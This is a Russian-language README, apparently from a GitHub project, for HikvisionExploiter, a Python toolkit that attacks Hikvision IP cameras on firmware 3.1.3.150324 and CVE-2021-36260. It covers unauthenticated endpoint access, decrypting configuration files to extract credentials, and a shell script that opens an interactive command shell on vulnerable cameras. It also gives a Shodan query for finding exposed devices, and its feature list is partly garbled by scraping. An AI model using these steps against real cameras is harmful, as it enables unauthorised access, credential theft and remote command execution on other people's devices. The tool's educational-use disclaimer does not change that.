
HikvisionExploiter — это утилита на Python, предназначенная для автоматизации эксплуатации и проверки доступности каталогов на сетевых камерах Hikvision, использующих веб-интерфейс версии 3.1.3.150324 + обнаружение CVE-2021-36260
HikvisionExploiter — мощный автоматизированный эксплуатационный набор инструментов, нацеленный на неаутентифицированные конечные точки IP-камер Hikvision, особенно тех, которые работают под версией прошивки 3.1.3.150324.
Он выполняет:
Создано для исследователей, участников красных команд и энтузиастов безопасности IoT.
/onvif-http/snapshot на доступность снимков/System/configurationFile, расшифровывает с помощью AES + XOR и извлекает учётные данные/Security/userswebLanguagelogs/ThreadPoolExecutorpip install -r requirements.txtffmpeg (опционально, для будущей возможности конвертации снимков в видео)pycrypto (для дешифрования конфигурации):
pip install pycrypto
git clone https://github.com/HexBuddy/HikvisionExploiter.git
cd HikvisionExploiter
pip3 install -r requirements.txt
Создайте файл targets.txt в следующем формате:
IP:PORT
Пример:
192.168.1.10:80
10.10.10.20:81
python3 checker.py
Это выполнит:
logs/IP_PORT_TIMESTAMP/Для интерактивного выполнения команд на уязвимом устройстве:
chmod +x shell.sh
./shell.sh <ip:port>
Пример:
./shell.sh 192.168.1.10:80
Если устройство уязвимо, вы попадёте в интерактивную оболочку:
hikvision-shell> uname -a
Linux hik-cam 3.0.8 #1 Wed Mar 18 ...
Используйте следующий Shodan-запрос для поиска открытых камер Hikvision:
3.1.3.150324
Включён совместимый с Nuclei шаблон: nuclei-template.yaml
Использование:
nuclei -t nuclei-template.yaml -list targets.txt
Обнаруживает:
MIT License ©
Подробнее см. в LICENSE.
Telegram: @HexBuddy127001
Создано с ❤️ только для образовательных и этических исследований.
График истории звёзд